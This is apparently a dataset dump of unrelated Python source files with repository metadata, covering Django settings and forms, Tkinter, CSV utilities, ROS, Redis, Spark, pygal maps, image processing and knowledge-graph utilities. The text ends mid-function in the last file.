WSGI_APPLICATION = 'todo_list.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
if development:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
else:
DATABASES = {
"default": dj_database_url.parse(os.environ.get("DATABASE_URL"))
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
django_heroku.settings(locals())
|
[
"[email protected]"
] | |
95986ae73d179770f7292b38dbaaf00b540d68bb
|
67ecf1aca10c6b3504027edc131d3f295a66ae08
|
/00-deleteintreeview.py
|
d3e2d07a7e5d08d4338fd394ee4a32966af7637f
|
[
"MIT"
] |
permissive
|
UncleEngineer/TkinterTrick
|
5efa58dee8612d48d18040debe7868c6b5815e3c
|
471a5f4906ddad195731410e9df1a2b35f466fcb
|
refs/heads/master
| 2020-03-16T09:57:28.696335 | 2018-06-22T10:23:39 | 2018-06-22T10:23:39 | 132,626,504 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,029 |
py
|
from tkinter import *
from tkinter import ttk
root = Tk()
tree = ttk.Treeview(root)
tree["columns"]=("one","two")
tree.column("one", width=100 )
tree.column("two", width=100)
tree.heading("one", text="coulmn A")
tree.heading("two", text="column B")
tree.insert("" , 0, text="Line 1", values=("1A","1b"))
id2 = tree.insert("", 1, "dir2", text="Dir 2")
tree.insert(id2, "end", "dir 2", text="sub dir 2", values=("2A","2B"))
##alternatively:
tree.insert("", 3, "dir3", text="Dir 3")
tree.insert("dir3", 3, text=" sub dir 3",values=("3A"," 3B"))
def edit():
x = tree.get_children()
for item in x: ## Changing all children from root item
tree.item(item, text="blub", values=("foo", "bar"))
def delete():
selected_item = tree.selection()[0] ## get selected item
tree.delete(selected_item)
tree.pack()
button_del = Button(root, text="del", command=delete)
button_del.pack()
button_del = Button(root, text="edit", command=edit)
button_del.pack()
root.mainloop()
|
[
"[email protected]"
] | |
7c2d17ddb06d955c905ab695d8215828781f9cfd
|
eb92c33f9f62b810681e9a84b6db841975b3f20d
|
/IOUtilities.py
|
3040ae917607bd86e43a0fbb53adaaf71dbcc885
|
[
"MIT"
] |
permissive
|
pumbas600/CriticalPath
|
7572f4611a76cc8de6f9f0a2be0a2ffb510a945f
|
31889c875dedf733aeb9a4ebeba8bf8930e86176
|
refs/heads/master
| 2022-10-12T00:16:58.468726 | 2020-06-16T09:39:06 | 2020-06-16T09:39:06 | 266,998,713 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,680 |
py
|
import csv
from _tkinter import TclError
import os.path as ospath
from enum import Enum
class Errors(Enum):
SUCCESS = 'Successfully completed the action.'
FILE_NOT_FOUND = "The file, {}, couldn't be found."
FILE_MADE = "The file, {}, didn't exist and so it has been created."
FILE_CURRENTLY_OPEN = 'The file, {}, cannot be accessed because it is currently open.'
CLIPBOARD_EMPTY = 'Your clipboard is currently empty.'
DUPLICATE_HEADER = 'A header exists multiple times - This is not allowed.'
@staticmethod
def is_error(error):
return type(error) is Errors and error != Errors.SUCCESS
class IOUtilities:
@staticmethod
def save_grid_list_to_clipboard(root, clipboard_list, item_to_list_converter,
headers=None, print_clipboard=False):
root.clipboard_clear()
if headers is not None:
root.clipboard_append('\t'.join(headers) + '\n')
for item in clipboard_list:
row = '\t'.join(item_to_list_converter(item))
root.clipboard_append(row + '\n')
if print_clipboard:
print(root.clipboard_get())
return Errors.SUCCESS
@staticmethod
def get_clipboard_as_dictionary_list(root, lower_headers=False):
try:
clipboard = root.clipboard_get()
rows = clipboard.split('\n')
headers = rows[0].split('\t')
if lower_headers:
headers = [h.lower() for h in headers]
for header in headers:
if headers.count(header) > 1:
return Errors.DUPLICATE_HEADER
dictionary_list = []
for row in rows[1:-1]:
columns = row.split('\t')
dict_data = dict(zip(headers, columns))
dictionary_list.append(dict_data)
return dictionary_list
except TclError:
return Errors.CLIPBOARD_EMPTY
@staticmethod
def get_csv_as_dictionary_list(path, not_found_callback=None, lower_headers=False):
if path[-4:] != '.csv':
path += '.csv'
if not ospath.isfile(path):
if not_found_callback is not None:
return not_found_callback(path)
else:
return Errors.FILE_NOT_FOUND
with open(path, 'r') as csvfile:
reader = csv.DictReader(csvfile)
if lower_headers:
reader.fieldnames = [h.lower().strip() for h in reader.fieldnames]
headers = reader.fieldnames
for header in headers:
if headers.count(header) > 1:
return Errors.DUPLICATE_HEADER
return list(reader)
@staticmethod
def create_csv_file_callback(headers):
def create_csv_file(path):
with open(path, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=headers)
writer.writeheader()
csvfile.close()
return Errors.FILE_MADE
return create_csv_file
@staticmethod
def write_csv_file_from_list(path, data_list, headers, item_to_list_converter):
if path[-4:] != '.csv':
path += '.csv'
try:
with open(path, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=headers)
writer.writeheader()
for item in data_list:
row = dict(zip(headers, item_to_list_converter(item)))
writer.writerow(row)
except PermissionError:
return Errors.FILE_CURRENTLY_OPEN
else:
return Errors.SUCCESS
|
[
"[email protected]"
] | |
8d53d54a950be32dfd8165fa1686bc0a2afa6a39
|
ac8364c25840f3de6734266280068aa374a7a79b
|
/3053-택시-기하학.py
|
f259599602dc2e9cf90592a58295bd54a64317f0
|
[] |
no_license
|
Zeta611/baekjoon-solutions
|
337e500302a94157d34c1e721457944456950b53
|
9f24ea2b8f2bc175b94d0d34ccab7b890bb06fc4
|
refs/heads/master
| 2021-11-07T15:44:00.014364 | 2021-10-18T13:23:20 | 2021-10-18T13:23:20 | 146,745,849 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 157 |
py
|
# Contest > Croatian Open Competition in Informatics > COCI 2006/2007 > Contest #1 2
import math
R = input()
print "%.6f\n%.6f" % (math.pi * R**2, 2 * R**2)
|
[
"[email protected]"
] | |
7011d3943f6f731fe47de23eacacda74e70c19d7
|
7a2c620ffa996b36916774b5710464f27c029801
|
/Sheet04/task02.py
|
6f0d9b2d29fc5f7bcd2b18e08f6eae60472580ed
|
[] |
no_license
|
dnychennnn/Computer-Vision-I
|
82f351b86913fccd18d7c56a3ad15b665027c473
|
ba1ecc5f5ff8787686076427446a6af2f810d589
|
refs/heads/master
| 2020-04-23T14:44:10.632942 | 2019-02-18T08:30:57 | 2019-02-18T08:30:57 | 171,241,825 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,169 |
py
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
from matplotlib import rc
#rc('text', usetex=True) # if you do not have latex installed simply uncomment this line + line 75
def load_data():
""" loads the data for this task
:return:
"""
fpath = 'images/ball.png'
radius = 70
Im = cv2.imread(fpath, 0).astype('float32')/255 # 0 .. 1
# we resize the image to speed-up the level set method
Im = cv2.resize(Im, dsize=(0, 0), fx=0.5, fy=0.5)
height, width = Im.shape
centre = (width // 2, height // 2)
Y, X = np.ogrid[:height, :width]
phi = radius - np.sqrt((X - centre[0]) ** 2 + (Y - centre[1]) ** 2)
return Im, phi
def get_contour(phi):
""" get all points on the contour
:param phi:
:return: [(x, y), (x, y), ....] points on contour
"""
eps = 1
A = (phi > -eps) * 1
B = (phi < eps) * 1
D = (A - B).astype(np.int32)
D = (D == 0) * 1
Y, X = np.nonzero(D)
return np.array([X, Y]).transpose()
# ===========================================
# RUNNING
# ===========================================
# FUNCTIONS
# ------------------------
# your implementation here
# Calculate the norm for each point, the shape of gradient is 2 * height * width
def norm(x, axis=0):
return np.sqrt(np.sum(np.square(x), axis=axis))
# ------------------------
if __name__ == '__main__':
n_steps = 20000
plot_every_n_step = 100
Im, phi = load_data()
fig = plt.figure(figsize=(16, 8))
ax1 = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
# ------------------------
# your implementation here
# Initialize the parameters
epslon = 1 / np.power(10, 4)
gamma = 0.5
dIm = np.array(np.gradient(Im))
omega =1./np.sqrt(1. + norm(dIm)**2)
# ------------------------
for t in range(n_steps):
# ------------------------
# your implementation here
# Calculate the gradient of phi
height, width = Im.shape
dphi = np.zeros((height, width))
for h in range(1, height-1):
for w in range(1, width-1):
phi_y = (phi[h + 1, w] - phi[h - 1, w]) / 2
phi_yy = phi[h + 1, w] - 2 * phi[h, w] + phi[h - 1, w]
phi_xy = (phi[h + 1, w + 1] - phi[h - 1, w + 1] - phi[h + 1, w - 1] + phi[h - 1, w - 1]) / 4
phi_x = (phi[h, w+1] - phi[h, w-1])/2
phi_xx = phi[h, w + 1] - 2 * phi[h, w] + phi[h, w - 1]
dphi[h, w] = (phi_xx*np.square(phi_y) - 2*phi_x*phi_y*phi_xy + phi_yy*np.square(phi_x))/(np.square(phi_x) + np.square(phi_y) + epslon)
# Update phi
phi = phi + gamma * omega * dphi
# ------------------------
if t % plot_every_n_step == 0:
ax1.clear()
ax1.imshow(Im, cmap='gray')
ax1.set_title('frame ' + str(t))
contour = get_contour(phi)
if len(contour) > 0:
ax1.scatter(contour[:, 0], contour[:, 1], color='red', s=1)
ax2.clear()
ax2.imshow(phi)
#ax2.set_title(r'$\phi$', fontsize=22)
plt.pause(0.01)
plt.show()
|
[
"[email protected]"
] | |
2c982da3a77795930b0c0b3c356bf6f4267a9c35
|
7aa112e54e5935ebad6e00f617220d02839a578e
|
/stickerify.py
|
4976ce30b04d124b6a52f896b290ca02e5ae73f9
|
[
"MIT"
] |
permissive
|
joelosw/Telegram_Bot
|
9b28013e1e69d1f2d4aa22901ab7c39b9bab096a
|
c1c60280eac0f67324806c31bf0fba44705da7f9
|
refs/heads/master
| 2022-12-25T08:19:09.919506 | 2020-04-08T08:08:36 | 2020-04-08T08:08:36 | 182,814,845 | 0 | 0 |
MIT
| 2022-12-08T05:00:57 | 2019-04-22T15:23:36 |
Python
|
UTF-8
|
Python
| false | false | 2,409 |
py
|
import numpy
from PIL import Image
import requests
import machine_learning
def sticker_from_rectangle(coordinates, url):
# max size for stickers
max_size = (512,512)
try:
# url for picture on telegram server
img = Image.open(requests.get(url, stream=True).raw)
except Exception:
img = Image.open("random.jpg")
if coordinates:
left = coordinates["left"]-150
top = coordinates["top"] - 150
right = coordinates["left"] + coordinates["width"] + 100
bottom = coordinates["top"] + coordinates["height"] + 100
else:
left = 0
top = 0
right = img.width
bottom = img.height
print(left,top,right,bottom)
crop = None
# crop ACS face coordinates
try:
crop = img.crop((left, top, right, bottom))
except Exception:
left = coordinates["left"]
top = coordinates["top"]
right = coordinates["left"] + coordinates["width"]
bottom = coordinates["top"] + coordinates["height"]
crop = img.crop((left, top, right, bottom))
# resize to sticker proportions if necessary (it generally is necessary)
width, height = crop.size
if height > width:
factor = 1 if height==0 else (512/float(height))
else:
factor = 1 if width==0 else (512/float(width))
crop = crop.resize((int(factor*width), 512)) if height > width else crop.resize((512, int(factor*height)))
crop.save("sticker.png", "PNG")
machine_learning.run_visualization("sticker.png")
create_sticker()
return "sticker.png"
def create_sticker():
or_img = Image.open("sticker.png")
or_img = or_img.convert(mode="RGBA")
mask_img = Image.open("cm.png")
mask_img = mask_img.convert(mode="RGBA")
mask_img = mask_img.resize((or_img.width, or_img.height))
transparent_vals = pixels_to_access(mask_img, or_img)
or_img.putdata(transparent_vals)
# need emoji info --> dynamic image name
or_img.save("sticker.png", "PNG")
return "sticker.png"
def scale(image, factor):
pass
def pixels_to_access(mask,or_img):
data = mask.getdata()
transparent = []
i=0
for item in data:
if item[0] == 0 and item[1] == 0 and item[2] == 0:
transparent.append((0,0,0,0))
else:
transparent.append(or_img.getdata()[i])
i+=1
return transparent
|
[
"[email protected]"
] | |
4b817c3e092dc8e83dad78044a79438fef7a44ef
|
055914b8b2f79bf55dccb3bfe8f2d41c7ce6cd59
|
/books/forms.py
|
6d9ca8d940d0a3fc7e1a60467c7a4aac50e8697a
|
[] |
no_license
|
mywave76/readit1
|
ec3f9cd45758ec8c028b508565762538ee04e8db
|
9d13d42dfddc9a58a8ac7a363cf952d48f30e760
|
refs/heads/master
| 2021-01-19T10:17:20.567950 | 2017-05-18T11:05:35 | 2017-05-18T11:05:35 | 87,851,636 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 455 |
py
|
from django import forms
class ReviewForm(forms.Form):
"""
Form for reviewing a book
"""
is_favourite = forms.BooleanField(
label='Favourite?',
help_text='In your top books of all time?',
required=False,
)
review = forms.CharField(
widget=forms.Textarea,
min_length=300,
error_messages={
'required': 'Please enter your review',
'min_length': 'Please write at least 300 characters (you have written %(show_value)s)'
}
)
|
[
"[email protected]"
] | |
c2096c302141110dd8b88c15a12d60e75092cfd2
|
c560886c018da73acedd795857c0fe6c334ed890
|
/venv/bin/pip3
|
a0048fff3bdd3fafc07ca773357d3e859ed4dd65
|
[] |
no_license
|
vigneshnin/zabbixreport
|
aebcb6c6d630a7a5104b29a1328e9f27a4a859d5
|
6dd897f4816d5000f2ce6704621448e6ddec0c01
|
refs/heads/master
| 2022-01-08T14:12:52.856960 | 2019-06-18T09:15:38 | 2019-06-18T09:15:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 413 |
#!/home/vigneshngr8/PycharmProjects/zabbixreport/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
|
[
"[email protected]"
] | ||
2f1642adf2c65906163910817f8df375846974fc
|
5dbf2bd2a011209a4b70f142f7d17af828372742
|
/web/migrations/0011_auto_20180409_2305.py
|
7ad0d070b596f81031cd4f393759a6ca2d166250
|
[] |
no_license
|
MHMasuk/takdhum-new
|
f52e2f06698bf411426af506a6c8329f0688b081
|
b3d874d8dc2310e58a7ae99fbb8380e834d3988f
|
refs/heads/master
| 2020-03-15T20:20:29.622496 | 2018-05-06T11:04:28 | 2018-05-06T11:04:28 | 132,329,901 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 507 |
py
|
# Generated by Django 2.0.3 on 2018-04-09 17:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('web', '0010_auto_20180407_2219'),
]
operations = [
migrations.RemoveField(
model_name='aboutus',
name='promo_video',
),
migrations.AlterField(
model_name='basic_info',
name='promo_video',
field=models.URLField(blank=True, null=True),
),
]
|
[
"[email protected]"
] | |
d2af03e3a4906a1fa23e9f3a1ce18e723be2b7dd
|
a5b4d77e760c6131ba1c5f040265a3b08d3c0478
|
/enemy_bot/enemy_bot_level5/burger_detect/scripts/image_save.py
|
e695863b746ba773cd8cf5ea415ec5f9c57f2dab
|
[
"BSD-3-Clause"
] |
permissive
|
kenjirotorii/burger_war_kit
|
700b511739299a9d90d23c70262ecf4856d234b7
|
d9b1b443f220980a4118c13cdf22174696c3db9c
|
refs/heads/main
| 2023-03-21T23:32:24.415502 | 2021-03-11T15:59:12 | 2021-03-11T15:59:12 | 337,704,943 | 0 | 1 |
BSD-3-Clause
| 2021-03-11T15:59:13 | 2021-02-10T11:36:22 |
Python
|
UTF-8
|
Python
| false | false | 1,046 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import random
#
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Image
import sys
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
import os
dir="Image/test/"
num=10*1000
class ImageGet():
def __init__(self):
rospy.Subscriber('/image_raw', Image, self.Image_save)
self.bridge = CvBridge()
self.count=0
def Image_save(self,data):
cv_image = self.bridge.imgmsg_to_cv2(data, "bgr8")
cv2.imshow("sample.jpg",cv_image)
cv2.waitKey(5)
#cv2.imwrite(dir+"sample"+repr(self.count)+".jpg",cv_image)
print("save done.")
#self.count+=1
def get_image(self):
r = rospy.Rate(1) # change speed 1fps
while not rospy.is_shutdown():
r.sleep()
if self.count>num:
break
if __name__ == '__main__':
if not os.path.exists(dir):
os.mkdir(dir)
rospy.init_node('get_image')
bot = ImageGet()
bot.get_image()
|
[
"[email protected]"
] | |
9b92373cf464a0275bfb39704ace4aaa54297003
|
cd49daf85b2f2a4241aa73fba67676f889e3d41c
|
/11day.py
|
0b35425da38fda063456305a02d31bb71a7fb550
|
[] |
no_license
|
siwoo281/python-study
|
9a7cc25071b80ffe1432ff846afb2a6d777db983
|
c235b8c9490e2fa85c6e58e20b0e2072600ad6e3
|
refs/heads/master
| 2023-02-22T15:44:34.562086 | 2021-01-26T14:52:00 | 2021-01-26T14:52:00 | 330,130,627 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 192 |
py
|
nums = []
sum = 0
for i in range(7):
num = int(input("정수를 입력 해주세요."))
nums.append(num)
for i in range(7):
sum = sum + nums[i]
average = sum / 7
print(average)
|
[
"[email protected]"
] | |
ce722b96d8fecb30f1a69bab0230ac92a06e1a2d
|
8681c50f52d1244448a173667916cf27d9685b30
|
/enjoy_download_requests.py
|
01ce9cb01cb14c0385d0e64f5973529b325b1b3c
|
[] |
no_license
|
hourglasskoala/spider
|
bb4a53b845bee4dad9fedc7ea592e174f5bdd628
|
1bcc325e99ec43429364dedf93876d1614f73f60
|
refs/heads/master
| 2020-03-31T17:12:04.417754 | 2018-10-23T03:55:39 | 2018-10-23T03:55:39 | 152,411,894 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 316 |
py
|
import requests
if __name__ == '__main__':
image_url = 'https://morvanzhou.github.io/static/img/description/learning_step_flowchart.png'
r = requests.get(image_url, stream=True)
with open('./images/image2.png', 'wb') as f:
for chunk in r.iter_content(chunk_size=32):
f.write(chunk)
|
[
"[email protected]"
] | |
4c00ec27527bf43ea1adb64e2aab49cfaa7e8473
|
a22b655b2265fe2e34de89ce1e8e1d47f37e4ac8
|
/assignment/migrations/0008_remove_assignment_created.py
|
d71dc14a4fe6b594ff6d10e16e3e89d27abb4b04
|
[] |
no_license
|
shravan-ks/Class_Network_System
|
b287b400fa2422e743a05255188b703d57eb8125
|
10841cef41a286c458603eae38d4bfdd3e4ef8c6
|
refs/heads/master
| 2022-11-27T14:23:26.111076 | 2019-09-28T20:27:32 | 2019-09-28T20:27:32 | 208,486,666 | 6 | 0 | null | 2022-11-22T03:58:16 | 2019-09-14T18:40:26 |
Python
|
UTF-8
|
Python
| false | false | 401 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2019-05-09 13:54
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('assignment', '0007_assignment_created'),
]
operations = [
migrations.RemoveField(
model_name='assignment',
name='created',
),
]
|
[
"[email protected]"
] | |
2164d42c3bd1009d1f13a0035f79365a0d3e7f15
|
6c91ed56292a39f8b1ddfc9cf721618c1e57ba93
|
/pillars/engines/redis.py
|
160408c2621ab45efb257b6e54a90ed598258368
|
[] |
no_license
|
Eyepea/pillars
|
233803df0f9760fa6552ac1e17b2a36fcd2bf03c
|
813253779de0db1edfb39560579af9558d1b7ec0
|
refs/heads/master
| 2022-12-10T16:27:56.420745 | 2019-03-06T14:52:33 | 2019-03-06T14:52:33 | 149,730,884 | 15 | 0 | null | 2022-12-08T02:03:11 | 2018-09-21T08:04:18 |
Python
|
UTF-8
|
Python
| false | false | 3,527 |
py
|
import asyncio
import logging
from contextlib import asynccontextmanager
from typing import Optional
import aioredis
import async_timeout
from ..app import Application
LOG = logging.getLogger(__name__)
class Redis:
def __init__(
self,
app: Application,
*args,
reconnection_timeoff: int = 10,
shutdown_timeout: int = 5,
**kwargs
) -> None:
self._loop = asyncio.get_event_loop()
self._task: Optional[asyncio.Task] = None
self._result: asyncio.Future = asyncio.Future()
self._connection_info = (args, kwargs)
self._shutdown_timeout = shutdown_timeout
self._reconnection_timeoff = reconnection_timeoff
app.on_startup.append(self._startup)
app.on_shutdown.append(self._shutdown)
app.on_cleanup.append(self._cleanup)
async def _connect(self) -> None:
try:
pool = await aioredis.create_pool(
*self._connection_info[0], **self._connection_info[1]
)
except ConnectionError:
LOG.exception("Redis connection error")
await asyncio.sleep(self._reconnection_timeoff)
self._task = self._loop.create_task(self._connect())
except Exception as e:
LOG.exception("Redis connection error")
self._result.set_exception(e)
else:
LOG.info("Redis connection pool created")
self._result.set_result(pool)
@asynccontextmanager
async def connection(self, timeout: int = 5) -> aioredis.RedisConnection:
async with async_timeout.timeout(timeout):
pool = await asyncio.shield(self._result)
try:
connection = await pool.acquire()
except ConnectionError:
LOG.debug("Connection error while acquiring connection")
self._result = asyncio.Future()
self._task = self._loop.create_task(self._connect())
pool = await asyncio.shield(self._result)
connection = await pool.acquire()
try:
yield connection
finally:
pool.release(connection)
async def status(self, timeout: int = 2) -> bool:
try:
async with self.connection(timeout=timeout) as con:
await con.execute("SET", "xxx_STATUS", 1)
await con.execute("DEL", "xxx_STATUS", 1)
except asyncio.TimeoutError:
return False
except Exception:
LOG.exception("Redis failed status")
return False
else:
LOG.log(4, "Redis status OK")
return True
async def _startup(self, app: Application) -> None:
LOG.debug("Starting Redis engine")
self._task = self._loop.create_task(self._connect())
self._result = asyncio.Future()
async def _shutdown(self, app: Application) -> None:
LOG.debug("Shutting down Redis engine")
if self._task and not self._task.done():
self._task.cancel()
if self._result.done():
pool = await self._result
pool.close()
else:
self._result.cancel()
async def _cleanup(self, app: Application) -> None:
LOG.debug("Cleaning up Redis engine")
try:
pool = await self._result
except asyncio.CancelledError:
pass
else:
await asyncio.wait_for(pool.wait_closed(), timeout=self._shutdown_timeout)
|
[
"[email protected]"
] | |
ce2b890e442ee5d8a8e046307f337c910de700c7
|
14e4606b932f004bb925f9adf847e2c6e1ff16ed
|
/distinct_spark.py
|
459c746293d84841d4ac0969ec58f1517b208683
|
[] |
no_license
|
nyu-cds/dov205_assignment3
|
4cf11dd23b75c24068c6597faa6383e9f3149757
|
189bebb6e3ff9b1612c3b201fac9f2bbbd90d271
|
refs/heads/master
| 2021-01-22T05:28:24.820049 | 2017-05-04T23:58:38 | 2017-05-05T00:01:13 | 81,666,483 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 650 |
py
|
from pyspark import SparkContext
import re
# remove any non-words and split lines into separate words
# finally, convert all words to lowercase
def splitter(line):
line = re.sub(r'^\W+|\W+$', '', line)
return map(str.lower, re.split(r'\W+', line))
def main(sc):
# Read input file.
text = sc.textFile('pg2701.txt')
# Split into words, filter for distinct words, get their count.
count = text.flatMap(splitter) \
.distinct() \
.count()
# Print the number of distinct terms.
print(count)
if __name__ == '__main__':
sc = SparkContext("local", "wordcount")
main(sc)
|
[
"[email protected]"
] | |
37cda467832d9959605d1668f2ef07cc8c293df9
|
ece6f45409ee2bcbff1be64fa1ac98e7805e0e18
|
/API:Data_Visualization/population_json.py
|
78c7c29a84dd29b055d74f7b1bbb767d4b2871b3
|
[] |
no_license
|
PickertJoe/python_exercises
|
5b9ac3334eec32e35a477d126c911d4ca07a4343
|
77955427db9c3342c9a51618a0cd9cf6f884fbee
|
refs/heads/master
| 2022-12-12T11:57:08.267814 | 2019-12-08T21:52:31 | 2019-12-08T21:52:31 | 184,834,676 | 1 | 0 | null | 2022-12-08T05:14:43 | 2019-05-04T00:16:12 |
Python
|
UTF-8
|
Python
| false | false | 1,293 |
py
|
# A program to read and analyze the data in population_data.json
import json
from comma import comma
from country_code import code_search
from pygal.maps.world import World
from pygal.style import RotateStyle
# Importing the data in the json file into a list
filename = "chapter_16/population_data.json"
with open(filename) as f:
population_data = json.load(f)
# Building a dictionary of the population data
cc_populations = {}
for country in population_data:
if country['Year'] == '2010':
country_name = country["Country Name"]
population = int(float(country["Value"]))
code = code_search(country_name)
if code:
cc_populations[code] = population
# Creating three separate categories for different population ranges
cc_pop1, cc_pop2, cc_pop3 = {}, {}, {}
for code, population in cc_populations.items():
if population > 1000000000:
cc_pop1[code] = population
elif population > 10000000:
cc_pop2[code] = population
else:
cc_pop3[code] = population
wm_style = RotateStyle('#336699')
wm = World(style=wm_style)
wm.title = "World Population in 2010, by Select Countries"
wm.add('1bn+', cc_pop1)
wm.add('10m - 1bn', cc_pop2)
wm.add('0-10m', cc_pop3)
wm.render_to_file('country_populations_category.svg')
|
[
"[email protected]"
] | |
f3503165cd1ace5452007f7d57957e0c0a1ed163
|
59fbeea017110472a788218db3c6459e9130c7fe
|
/[211]Design Add and Search Words Data Structure.py
|
9980dcd8b49ade61ed4dee0d0b2ac3865846077a
|
[] |
no_license
|
niufenjujuexianhua/Leetcode
|
82b55d9382bc9f63f4d9da9431194e20a4d299f1
|
542c99e038d21429853515f62af51a77deaa4d9c
|
refs/heads/master
| 2022-04-27T16:55:00.035969 | 2022-03-10T01:10:04 | 2022-03-10T01:10:04 | 79,742,663 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,818 |
py
|
# Design a data structure that supports adding new words and finding if a string
# matches any previously added string.
#
# Implement the WordDictionary class:
#
#
# WordDictionary() Initializes the object.
# void addWord(word) Adds word to the data structure, it can be matched later.
#
# bool search(word) Returns true if there is any string in the data structure t
# hat matches word or false otherwise. word may contain dots '.' where dots can be
# matched with any letter.
#
#
#
# Example:
#
#
# Input
# ["WordDictionary","addWord","addWord","addWord","search","search","search","se
# arch"]
# [[],["bad"],["dad"],["mad"],["pad"],["bad"],[".ad"],["b.."]]
# Output
# [null,null,null,null,false,true,true,true]
#
# Explanation
# WordDictionary wordDictionary = new WordDictionary();
# wordDictionary.addWord("bad");
# wordDictionary.addWord("dad");
# wordDictionary.addWord("mad");
# wordDictionary.search("pad"); // return False
# wordDictionary.search("bad"); // return True
# wordDictionary.search(".ad"); // return True
# wordDictionary.search("b.."); // return True
#
#
#
# Constraints:
#
#
# 1 <= word.length <= 500
# word in addWord consists lower-case English letters.
# word in search consist of '.' or lower-case English letters.
# At most 50000 calls will be made to addWord and search.
#
# Related Topics Backtracking Depth-first Search Design Trie
# 👍 2758 👎 121
# leetcode submit region begin(Prohibit modification and deletion)
class Node():
def __init__(self):
self.kids = {}
self.end = False
class WordDictionary(object):
def __init__(self):
self.trie = Node()
def addWord(self, word):
p = self.trie
for c in word:
if c not in p.kids:
p.kids[c] = Node()
p = p.kids[c]
p.end = True
def search(self, word):
p = self.trie
return self._search(p, word, 0)
def _search(self, trie, word, i):
if i == len(word):
return trie.end
if not trie.kids or (word[i] != '.' and word[i] not in trie.kids):
return False
if word[i] != '.':
return self._search(trie.kids[word[i]], word, i + 1)
else:
return any(self._search(trie.kids[node], word, i + 1) for node in trie.kids)
# wordDictionary = WordDictionary();
# wordDictionary.addWord("bad");
# wordDictionary.addWord("dad");
# wordDictionary.addWord("mad");
# wordDictionary.search("pad");
# wordDictionary.search("bad");
# wordDictionary.search(".ad");
# wordDictionary.search("b..");
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
# leetcode submit region end(Prohibit modification and deletion)
|
[
"[email protected]"
] | |
2cbf4dec4904b5a4b3767fd1b54f122bd69c3a27
|
81e95540c15acbf47aa0549fdf8aef948953bb1c
|
/Knowledge Graph/KSGAN/data_utils.py
|
36c64430476f2f7ebe55d3afd7ff4ff2abd338cb
|
[] |
no_license
|
TAM-Lab/TAMRepository
|
809c96c027b2f71a836a59e05907bdb3f163c947
|
1099a1b2dd13ed8d3c701c89ba6e3e973f03d3f6
|
refs/heads/master
| 2023-05-14T21:41:25.536228 | 2021-05-30T12:36:57 | 2021-05-30T12:36:57 | 309,056,410 | 1 | 2 | null | 2020-11-05T09:25:24 | 2020-11-01T09:51:23 |
Python
|
UTF-8
|
Python
| false | false | 2,224 |
py
|
from random import randint
from collections import defaultdict
import torch
def heads_tails(n_ent, train_data, valid_data=None, test_data=None):
train_src, train_rel, train_dst = train_data
if valid_data:
valid_src, valid_rel, valid_dst = valid_data
else:
valid_src = valid_rel = valid_dst = []
if test_data:
test_src, test_rel, test_dst = test_data
else:
test_src = test_rel = test_dst = []
all_src = train_src + valid_src + test_src
all_rel = train_rel + valid_rel + test_rel
all_dst = train_dst + valid_dst + test_dst
heads = defaultdict(lambda: set())
tails = defaultdict(lambda: set())
for s, r, t in zip(all_src, all_rel, all_dst):
tails[(s, r)].add(t)
heads[(t, r)].add(s)
heads_sp = {}
tails_sp = {}
for k in tails.keys():
tails_sp[k] = torch.sparse.FloatTensor(torch.LongTensor([list(tails[k])]),
torch.ones(len(tails[k])), torch.Size([n_ent]))
for k in heads.keys():
heads_sp[k] = torch.sparse.FloatTensor(torch.LongTensor([list(heads[k])]),
torch.ones(len(heads[k])), torch.Size([n_ent]))
return heads_sp, tails_sp
def inplace_shuffle(*lists):
idx = []
for i in range(len(lists[0])):
idx.append(randint(0, i))
for ls in lists:
for i, item in enumerate(ls):
j = idx[i]
ls[i], ls[j] = ls[j], ls[i]
def batch_by_num(n_batch, *lists, n_sample=None):
if n_sample is None:
